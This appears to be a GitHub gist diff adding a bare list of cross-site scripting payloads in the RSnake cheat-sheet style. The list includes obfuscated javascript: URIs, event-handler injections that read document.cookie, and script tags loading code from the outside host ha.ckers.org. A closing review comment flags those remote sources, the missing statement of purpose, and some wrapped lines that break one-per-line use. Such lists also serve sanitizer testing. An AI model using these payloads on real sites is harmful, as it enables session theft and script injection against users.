
@funkaoshi
Created February 19, 2014 01:46

Revisions

  1. funkaoshi created this gist Feb 19, 2014.
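--- a/XSS Strings
+++ b/XSS Strings
@@ -0,0 +1,94 @@
+';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
+alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
+></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
+
+'';!--"<XSS>=&{()}
+
+<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
+
+<IMG SRC="javascript:alert('XSS');">
+
+<IMG SRC=javascript:alert('XSS')>
+
+<IMG SRC=JaVaScRiPt:alert('XSS')>
+
+<IMG SRC=javascript:alert("XSS")>
+
+<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
+
+<a onmouseover="alert(document.cookie)">xxs link</a>
+
+<a onmouseover=alert(document.cookie)>xxs link</a>
+
+<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
+
+<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+
+<IMG SRC=# onmouseover="alert('xxs')">
+
+<IMG SRC= onmouseover="alert('xxs')">
+
+<IMG onmouseover="alert('xxs')">
+
+<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
+
+<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
+&#39;&#88;&#83;&#83;&#39;&#41;>
+
+<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
+#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
+
+<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
+
+<IMG SRC="jav ascript:alert('XSS');">
+
+<IMG SRC="jav&#x09;ascript:alert('XSS');">
+
+<IMG SRC="jav&#x0A;ascript:alert('XSS');">
+
+<IMG SRC="jav&#x0D;ascript:alert('XSS');">
+
+<IMG SRC=" &#14; javascript:alert('XSS');">
+
+<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
+
+<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+<<SCRIPT>alert("XSS");//<</SCRIPT>
+
+<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
+
+<SCRIPT SRC=//ha.ckers.org/.j>
+
+<IMG SRC="javascript:alert('XSS')"
+
+<iframe src=http://ha.ckers.org/scriptlet.html <
+
+\";alert('XSS');//
+
+
+
+</TITLE><SCRIPT>alert("XSS");</SCRIPT>
+
+
+<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
+
+
+<BODY BACKGROUND="javascript:alert('XSS')">
+
+
+<IMG DYNSRC="javascript:alert('XSS')">
+
+
+<IMG LOWSRC="javascript:alert('XSS')">
+
+<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
+
+<IMG SRC='vbscript:msgbox("XSS")'>
+
+
+<IMG SRC="livescript:[code]">
+
+<BODY ONLOAD=alert('XSS')>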
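Review bot: Several of the added entries (the `SCRIPT SRC=http://ha.ckers.org/xss.js` forms, the `//ha.ckers.org/.j` form and the `scriptlet.html` iframe) pull content from a third-party host, so when one of them gets through a filter under test, whoever controls that domain decides what runs in the tested origin; they should point at a host the tester controls, for example `http://xss-test.example/xss.js` (constructed placeholder). The file also carries no note on provenance or purpose; the strings look like the RSnake cheat-sheet set, and a sibling README line such as `Inputs for output-encoding and sanitizer regression tests, one vector per entry` would tell a reader what the list is for. The two numeric-entity entries and the opening three lines appear to be hard-wrapped, and `livescript:[code]` still holds a placeholder, so a harness that reads one vector per line would feed fragments to the sanitizer and record passes that say nothing about the filter.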